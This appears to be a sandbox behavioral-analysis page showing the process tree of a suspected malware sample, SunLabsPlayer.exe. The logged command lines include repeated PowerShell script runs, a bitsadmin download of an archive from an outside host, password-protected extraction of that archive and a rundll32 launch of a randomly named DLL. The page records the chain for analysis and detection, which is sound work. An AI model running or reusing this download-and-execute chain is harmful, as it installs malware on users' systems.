| ZeroBOX

SunLabsPlayer.exe "C:\Users\test22\AppData\Local\Temp\SunLabsPlayer.exe"
1108
- powershell.exe powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\test22\AppData\Local\Temp\nse65F8.tmp\tempfile.ps1"
  1976
- powershell.exe powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\test22\AppData\Local\Temp\nse65F8.tmp\tempfile.ps1"
  2300
- powershell.exe powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\test22\AppData\Local\Temp\nse65F8.tmp\tempfile.ps1"
  1788
- powershell.exe powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\test22\AppData\Local\Temp\nse65F8.tmp\tempfile.ps1"
  2740
- powershell.exe powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\test22\AppData\Local\Temp\nse65F8.tmp\tempfile.ps1"
  2680
- powershell.exe powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\test22\AppData\Local\Temp\nse65F8.tmp\tempfile.ps1"
  2092
- powershell.exe powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\test22\AppData\Local\Temp\nse65F8.tmp\tempfile.ps1"
  2488
- bitsadmin.exe "bitsadmin" /Transfer helper http://moonlabmediacompany.com/data/data.7z C:\zip.7z
  872
- data_load.exe "C:\Program Files (x86)\lighteningplayer\data_load.exe" -pZerFyxswOU1kSPo -y x C:\zip.7z -o"C:\Program Files\temp_files\"
  732
- data_load.exe "C:\Program Files (x86)\lighteningplayer\data_load.exe" -pi9YcQvhaRhVM6Jx -y x C:\zip.7z -o"C:\Program Files\temp_files\"
  2608
- powershell.exe powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\test22\AppData\Local\Temp\nse65F8.tmp\tempfile.ps1"
  2892
- powershell.exe powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\test22\AppData\Local\Temp\nse65F8.tmp\tempfile.ps1"
  2420
- powershell.exe powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\test22\AppData\Local\Temp\nse65F8.tmp\tempfile.ps1"
  3068
- powershell.exe powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\test22\AppData\Local\Temp\nse65F8.tmp\tempfile.ps1"
  3064
- powershell.exe powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\test22\AppData\Local\Temp\nse65F8.tmp\tempfile.ps1"
  1332
- rundll32.exe C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\RUkjoVYw\RUkjoVYw.dll" RUkjoVYw
  772
  - rundll32.exe C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\RUkjoVYw\RUkjoVYw.dll" RUkjoVYw
    1868
- powershell.exe powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\test22\AppData\Local\Temp\nse65F8.tmp\tempfile.ps1"
  1896
- powershell.exe powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\test22\AppData\Local\Temp\nse65F8.tmp\tempfile.ps1"
  1888
- powershell.exe powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\test22\AppData\Local\Temp\nse65F8.tmp\tempfile.ps1"
  2708
- powershell.exe powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\test22\AppData\Local\Temp\nse65F8.tmp\tempfile.ps1"
  1308
explorer.exe C:\Windows\Explorer.EXE
1848

No process loaded Click on a process in the tree above to load its data.

PID
Parent PID

default registry file network process services synchronisation iexplore office pdf

Behavioral Analysis

Process tree

Process contents